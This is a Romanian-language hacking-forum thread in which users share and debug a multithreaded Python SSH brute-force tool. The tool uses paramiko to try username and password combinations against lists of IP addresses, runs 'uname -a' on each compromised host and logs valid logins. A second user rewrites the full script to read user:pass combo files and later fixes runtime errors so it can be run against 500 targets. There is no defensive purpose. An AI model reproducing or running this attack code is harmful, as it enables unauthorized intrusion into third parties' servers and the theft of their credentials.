kmkozeu Posted February 16, 2019 Report Posted February 16, 2019 Salut rst, am vazut o sursa de ssh bruteforce in python mai exact a lui @Elohim sursa ia usererele dintr-un fisier diferit si parolele din alt fisier is curios daca poate cineva sa o modifice sa ia din acelasi fisier mai exact ex: pass.txt in fisier sa fie " user:pass " sau "user pass " aveti sursa mai jos, thx import paramiko, sys, Queue, threading class SSHBrute(threading.Thread): def __init__(self, queue): threading.Thread.__init__(self) self.queue = queue def run(self): while True: ip,user,passwd = self.queue.get() self.kraken(ip,user,passwd) self.queue.task_done() def kraken(self,ip,user,passwd): try: if ip in cracked: return False if '%user%' in str(passwd): passwd = passwd.split("%")[0] + user + passwd.split("%")[2] if '%User%' in str(passwd): pwd = user + passwd.split("%")[2] passwd = passwd.split("%")[0]+pwd.title() if str(passwd) == '%null%': passwd = '' ssh = paramiko.SSHClient() ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) ssh.connect(ip, username=user, password=passwd, timeout=35) raw.write(ip+' '+user+' '+passwd+'\n') raw.flush() chan = ssh.get_transport().open_session() chan.settimeout(35) chan.exec_command('uname -a') data = chan.recv(1024) if len(data) == 0: nologs.write(ip+' '+user+' '+passwd+'\n') nologs.flush() return False val.write(ip+' '+user+' '+passwd+'|'+data.rstrip()+'\n') val.flush() cracked.append(ip) chan.close() ssh.close() return True except Exception, e: if 'uthent' in str(e): if dbg == 'bad': bad.write(ip+'\n') bad.flush() #print '\r[+]Tried '+ip+' '+user+' '+passwd+' ' ssh.close() return False #print ip, str(e) ssh.close() return False def brutemain(): if len(sys.argv) < 2: print """ SSH Brute Force Tool Author: @Elohim [RST] Usage: bruter ThreadNumber IpFile UserFile PassFile FilterSwitch* *The filter Switch Takes Either the word "bad" or "no". If you supply the word bad, it filters in bad.txt only the ips which indeed support ssh AUTH and password didn't work""" return False ThreadNR = int(sys.argv[1]) queue = Queue.Queue(maxsize=20000) try: i = 0 for i in range(ThreadNR): t = SSHBrute(queue) t.daemon = True t.start() i += 1 except Exception, e: print 'Cant start more than',i,'Threads!' global bad global val global nologs global cracked global raw cracked = [] bad = open('bad.txt','w') val = open('valid.txt','a') nologs = open('nologins.txt','a') raw = open('raw.txt','a') with open(str(sys.argv[2]),'rU') as ipf: ips = ipf.read().splitlines() with open(str(sys.argv[3]),'rU') as uf: users = uf.read().splitlines() with open(str(sys.argv[4]),'rU') as pf: passwords = pf.read().splitlines() global dbg dbg = str(sys.argv[5]) try: for password in passwords: for user in users: for ip in ips: queue.put((ip,user,password)) except: pass queue.join() if __name__ == "__main__": brutemain() Quote
Turry Posted February 16, 2019 Report Posted February 16, 2019 Faci o singura variabila in care tii toate combo-urile id:pass Dupa faci un loop peste combo-uri si faci un split(":") si salvezi primul element in lista cu ID-uri si al doilea element in lista cu pass-uri. Quote
Active Members MrGrj Posted February 16, 2019 Active Members Report Posted February 16, 2019 import Queue import paramiko import sys import threading class SSHBrute(threading.Thread): def __init__(self, queue): threading.Thread.__init__(self) self.queue = queue def run(self): while True: ip, user, passwd = self.queue.get() self.kraken(ip, user, passwd) self.queue.task_done() def kraken(self, ip, user, passwd): cracked = [] bad = open('bad.txt', 'w') val = open('valid.txt', 'a') nologs = open('nologins.txt', 'a') raw = open('raw.txt', 'a') dbg = str(sys.argv[4]) try: if ip in cracked: return False if '%user%' in str(passwd): passwd = '{}{}{}'.format(passwd.split("%")[0], user, passwd.split("%")[2]) if '%User%' in str(passwd): pwd = '{}{}'.format(user, passwd.split("%")[2]) passwd = '{}{}'.format(passwd.split("%")[0], pwd.title()) if str(passwd) == '%null%': passwd = '' ssh = paramiko.SSHClient() ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) ssh.connect(ip, username=user, password=passwd, timeout=35) raw.write(ip + ' ' + user + ' ' + passwd + '\n') raw.flush() chan = ssh.get_transport().open_session() chan.settimeout(35) chan.exec_command('uname -a') data = chan.recv(1024) if len(data) == 0: nologs.write('{} {} {}\n'.format(ip, user, passwd)) nologs.flush() return False val.write('{} {} {}|{}\n'.format(ip, user, passwd, data.rstrip())) val.flush() cracked.append(ip) chan.close() ssh.close() return True except Exception as e: if 'uthent' in str(e): if dbg == 'bad': bad.write(ip + '\n') bad.flush() ssh.close() return False ssh.close() return False def brutemain(): if len(sys.argv) < 2: return False ThreadNR = int(sys.argv[1]) queue = Queue.Queue(maxsize=20000) try: i = 0 for i in range(ThreadNR): t = SSHBrute(queue) t.daemon = True t.start() i += 1 except Exception as e: print('Cant start more than {} threads because: {}.'.format(i, e)) with open(str(sys.argv[2]), 'rU') as ipf: ips = ipf.read().splitlines() with open(str(sys.argv[3]), 'rU') as uf: users_and_passwds = uf.read().splitlines() try: for user_and_pass in users_and_passwds: for ip in ips: queue.put((ip, user_and_pass.split(':')[0].strip(), user_and_pass.split(':')[1].strip())) except Exception as e: print('Exception raised: {}'.format(e)) pass queue.join() if __name__ == "__main__": brutemain() Quote
kmkozeu Posted February 16, 2019 Author Report Posted February 16, 2019 5 hours ago, MrGrj said: import Queue import paramiko import sys import threading class SSHBrute(threading.Thread): def __init__(self, queue): threading.Thread.__init__(self) self.queue = queue def run(self): while True: ip, user, passwd = self.queue.get() self.kraken(ip, user, passwd) self.queue.task_done() def kraken(self, ip, user, passwd): cracked = [] bad = open('bad.txt', 'w') val = open('valid.txt', 'a') nologs = open('nologins.txt', 'a') raw = open('raw.txt', 'a') dbg = str(sys.argv[4]) try: if ip in cracked: return False if '%user%' in str(passwd): passwd = '{}{}{}'.format(passwd.split("%")[0], user, passwd.split("%")[2]) if '%User%' in str(passwd): pwd = '{}{}'.format(user, passwd.split("%")[2]) passwd = '{}{}'.format(passwd.split("%")[0], pwd.title()) if str(passwd) == '%null%': passwd = '' ssh = paramiko.SSHClient() ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) ssh.connect(ip, username=user, password=passwd, timeout=35) raw.write(ip + ' ' + user + ' ' + passwd + '\n') raw.flush() chan = ssh.get_transport().open_session() chan.settimeout(35) chan.exec_command('uname -a') data = chan.recv(1024) if len(data) == 0: nologs.write('{} {} {}\n'.format(ip, user, passwd)) nologs.flush() return False val.write('{} {} {}|{}\n'.format(ip, user, passwd, data.rstrip())) val.flush() cracked.append(ip) chan.close() ssh.close() return True except Exception as e: if 'uthent' in str(e): if dbg == 'bad': bad.write(ip + '\n') bad.flush() ssh.close() return False ssh.close() return False def brutemain(): if len(sys.argv) < 2: return False ThreadNR = int(sys.argv[1]) queue = Queue.Queue(maxsize=20000) try: i = 0 for i in range(ThreadNR): t = SSHBrute(queue) t.daemon = True t.start() i += 1 except Exception as e: print('Cant start more than {} threads because: {}.'.format(i, e)) with open(str(sys.argv[2]), 'rU') as ipf: ips = ipf.read().splitlines() with open(str(sys.argv[3]), 'rU') as uf: users_and_passwds = uf.read().splitlines() try: for user_and_pass in users_and_passwds: for ip in ips: queue.put((ip, user_and_pass.split(':')[0].strip(), user_and_pass.split(':')[1].strip())) except Exception as e: print('Exception raised: {}'.format(e)) pass queue.join() if __name__ == "__main__": brutemain() File "t.py", line 16 self.queue.task_done()? ^ SyntaxError: invalid syntax Quote
kmkozeu Posted February 16, 2019 Author Report Posted February 16, 2019 (edited) 6 hours ago, MrGrj said: import Queue import paramiko import sys import threading class SSHBrute(threading.Thread): def __init__(self, queue): threading.Thread.__init__(self) self.queue = queue def run(self): while True: ip, user, passwd = self.queue.get() self.kraken(ip, user, passwd) self.queue.task_done() def kraken(self, ip, user, passwd): cracked = [] bad = open('bad.txt', 'w') val = open('valid.txt', 'a') nologs = open('nologins.txt', 'a') raw = open('raw.txt', 'a') dbg = str(sys.argv[4]) try: if ip in cracked: return False if '%user%' in str(passwd): passwd = '{}{}{}'.format(passwd.split("%")[0], user, passwd.split("%")[2]) if '%User%' in str(passwd): pwd = '{}{}'.format(user, passwd.split("%")[2]) passwd = '{}{}'.format(passwd.split("%")[0], pwd.title()) if str(passwd) == '%null%': passwd = '' ssh = paramiko.SSHClient() ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) ssh.connect(ip, username=user, password=passwd, timeout=35) raw.write(ip + ' ' + user + ' ' + passwd + '\n') raw.flush() chan = ssh.get_transport().open_session() chan.settimeout(35) chan.exec_command('uname -a') data = chan.recv(1024) if len(data) == 0: nologs.write('{} {} {}\n'.format(ip, user, passwd)) nologs.flush() return False val.write('{} {} {}|{}\n'.format(ip, user, passwd, data.rstrip())) val.flush() cracked.append(ip) chan.close() ssh.close() return True except Exception as e: if 'uthent' in str(e): if dbg == 'bad': bad.write(ip + '\n') bad.flush() ssh.close() return False ssh.close() return False def brutemain(): if len(sys.argv) < 2: return False ThreadNR = int(sys.argv[1]) queue = Queue.Queue(maxsize=20000) try: i = 0 for i in range(ThreadNR): t = SSHBrute(queue) t.daemon = True t.start() i += 1 except Exception as e: print('Cant start more than {} threads because: {}.'.format(i, e)) with open(str(sys.argv[2]), 'rU') as ipf: ips = ipf.read().splitlines() with open(str(sys.argv[3]), 'rU') as uf: users_and_passwds = uf.read().splitlines() try: for user_and_pass in users_and_passwds: for ip in ips: queue.put((ip, user_and_pass.split(':')[0].strip(), user_and_pass.split(':')[1].strip())) except Exception as e: print('Exception raised: {}'.format(e)) pass queue.join() if __name__ == "__main__": brutemain() am rezolvat problema de mai sus, erau pusi ? la sfarsit la 2 linii, acum am alta problema mai exact eroarea asta cate thread-uri pun de atatea ori o da. root@mail:/home/administrator# python t.py 500 ips pass Exception in thread Thread-26: Traceback (most recent call last): File "/usr/lib/python2.7/threading.py", line 810, in __bootstrap_inner self.run() File "t.py", line 15, in run self.kraken(ip, user, passwd) File "t.py", line 24, in kraken dbg = str(sys.argv[4]) IndexError: list index out of range si asta No handlers could be found for logger "paramiko.transport" Edited February 16, 2019 by kmkozeu Quote
Active Members MrGrj Posted February 19, 2019 Active Members Report Posted February 19, 2019 On 2/16/2019 at 8:55 PM, kmkozeu said: File "t.py", line 24, in kraken dbg = str(sys.argv[4]) Trebuie sa mai pui un argument la sfarsitul comenzii: python t.py 500 ips pass bad # adauga asta ^^^ On 2/16/2019 at 8:55 PM, kmkozeu said: No handlers could be found for logger "paramiko.transport" Trebuie sa adaugi asta: paramiko.util.log_to_file("filename.log") Quote
